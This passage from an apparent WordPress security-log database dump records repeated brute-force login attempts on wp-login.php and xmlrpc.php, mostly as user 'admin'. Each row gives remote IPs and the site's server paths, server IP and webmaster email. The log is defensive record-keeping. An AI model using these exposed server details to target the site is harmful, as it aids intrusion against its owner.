06:25:28',18255088,19554760,'https://bintara.com.my/xmlrpc.php',1,0,'148.72.23.181'),(23987,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"78.47.68.84\";s:11:\"REMOTE_PORT\";s:5:\"51140\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX8tG71rBLb0GV3O7mTVewAAAE4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568615707.1956\";s:12:\"REQUEST_TIME\";s:10:\"1568615707\";}}','notice','2019-09-16 06:35:08','2019-09-16 06:35:07',17738080,19227928,'https://bintara.com.my/wp-login.php',1,0,'78.47.68.84'),(23988,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"78.47.68.84\";s:11:\"REMOTE_PORT\";s:5:\"51610\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX8tHWCCaIOMm5l5jJE3mQAAAQw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568615710.0013\";s:12:\"REQUEST_TIME\";s:10:\"1568615710\";}}','notice','2019-09-16 06:35:11','2019-09-16 06:35:10',18257600,19556840,'https://bintara.com.my/xmlrpc.php',1,0,'78.47.68.84'),(23989,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"159.203.12.18\";s:11:\"REMOTE_PORT\";s:5:\"37168\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX8voOBXE2JRepjOtvmsKQAAAAg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568616352.5152\";s:12:\"REQUEST_TIME\";s:10:\"1568616352\";}}','notice','2019-09-16 06:45:53','2019-09-16 06:45:52',17736776,19228640,'https://bintara.com.my/wp-login.php',1,0,'159.203.12.18'),(23990,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"159.203.12.18\";s:11:\"REMOTE_PORT\";s:5:\"38166\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX8vo71rBLb0GV3O7mTVyAAAAEE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568616355.3429\";s:12:\"REQUEST_TIME\";s:10:\"1568616355\";}}','notice','2019-09-16 06:45:56','2019-09-16 06:45:55',18255088,19554760,'https://bintara.com.my/xmlrpc.php',1,0,'159.203.12.18'),(23991,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.84.180.90\";s:11:\"REMOTE_PORT\";s:5:\"37872\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX8wgr1rBLb0GV3O7mTV2QAAAFY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568616579.0685\";s:12:\"REQUEST_TIME\";s:10:\"1568616579\";}}','notice','2019-09-16 06:49:40','2019-09-16 06:49:39',17736776,19228640,'https://bintara.com.my/wp-login.php',1,0,'185.84.180.90'),(23992,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.84.180.90\";s:11:\"REMOTE_PORT\";s:5:\"38446\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX8whuBXE2JRepjOtvmsVQAAABQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568616582.2664\";s:12:\"REQUEST_TIME\";s:10:\"1568616582\";}}','notice','2019-09-16 06:49:43','2019-09-16 06:49:42',18255088,19554760,'https://bintara.com.my/xmlrpc.php',1,0,'185.84.180.90'),(23993,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"50.63.165.245\";s:11:\"REMOTE_PORT\";s:5:\"58190\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX8yWr1rBLb0GV3O7mTWFwAAAEs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568617050.1396\";s:12:\"REQUEST_TIME\";s:10:\"1568617050\";}}','notice','2019-09-16 06:57:31','2019-09-16 06:57:30',17743704,19231808,'https://bintara.com.my/wp-login.php',1,0,'50.63.165.245'),(23994,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"50.63.165.245\";s:11:\"REMOTE_PORT\";s:5:\"58190\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX8yWr1rBLb0GV3O7mTWFwAAAEs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568617050.1396\";s:12:\"REQUEST_TIME\";s:10:\"1568617050\";}}','notice','2019-09-16 06:57:32','2019-09-16 06:57:30',17905560,19231808,'https://bintara.com.my/wp-login.php',1,0,'50.63.165.245'),(23995,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"50.63.165.245\";s:11:\"REMOTE_PORT\";s:5:\"59784\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX8yYgavjo3v4tJT4rvZCwAAAIs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568617058.5941\";s:12:\"REQUEST_TIME\";s:10:\"1568617058\";}}','notice','2019-09-16 06:57:39','2019-09-16 